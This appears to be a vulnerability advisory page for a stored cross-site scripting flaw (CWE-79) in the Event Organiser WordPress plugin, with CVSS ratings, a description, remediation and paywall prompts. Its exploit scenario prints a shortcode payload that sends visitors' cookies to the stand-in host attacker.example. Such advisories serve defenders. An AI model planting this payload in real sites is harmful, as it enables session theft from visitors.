Severity by source
AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
Stored XSS with Contributor auth (PR:L) fires on normal page visit; Changed Scope reflects browser-context execution; no availability impact applies.
Primary rating from Vendor (Wordfence).
CVSS VectorVendor: Wordfence
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
Lifecycle Timeline
2DescriptionCVE.org
The Event Organiser plugin for WordPress is vulnerable to Stored Cross-Site Scripting in all versions up to, and including, 3.12.9. This is due to the 'eo_events' shortcode accepting attacker-controlled 'no_events' content and rendering it in event list templates without output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
AnalysisAI
Stored Cross-Site Scripting in the Event Organiser WordPress plugin (all versions through 3.12.9) allows an authenticated attacker with Contributor-level access or higher to inject arbitrary JavaScript via the unescaped 'no_events' parameter of the 'eo_events' shortcode. The payload persists server-side and executes in any visitor's browser when they load a page containing the injected shortcode with no matching events. …
Unlock full vulnerability intelligence
- Risk assessment & exploitation conditions
- Attack chain visualization
- Remediation with exact patch versions
- Threat intelligence from 22 sources
- Personal watchlist & email alerts
Free forever · No credit card required
Attack ChainAIDerived
Hypothetical attack flow derived from CVE metadata
Vulnerability AssessmentAI
| Exploitation | Exploitation requires an authenticated WordPress account with Contributor-level access or higher - this is confirmed by the CVSS vector (PR:L) and the CVE description. … Additional conditions and limiting factors are described in the full assessment. |
| Risk Assessment | The NVD CVSS 3.1 score of 6.4 (Medium) is well-calibrated for this vulnerability. … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in. |
| Exploit Scenario | An attacker registers or socially engineers a Contributor-level WordPress account on the target site. They create a post containing [eo_events no_events='<script>fetch("https://attacker.example/c?d="+document.cookie)</script>'], which WordPress saves without sanitization. … |
| Remediation | Update the Event Organiser plugin to the version that incorporates changeset 3589132 from the WordPress plugin SVN repository (https://plugins.trac.wordpress.org/changeset/3589132/event-organiser); this commit adds proper output escaping to the 'no_events' shortcode parameter. … Detailed patch versions, workarounds, and compensating controls in full report. |
Threat intelligence, references, and detailed analysis are available after sign-in.
Same weakness CWE-79 – Cross-site Scripting (XSS)
View allShare
External POC / Exploit Code
Leaving vuln.today
EUVD-2026-40904
GHSA-fmmj-9298-j37p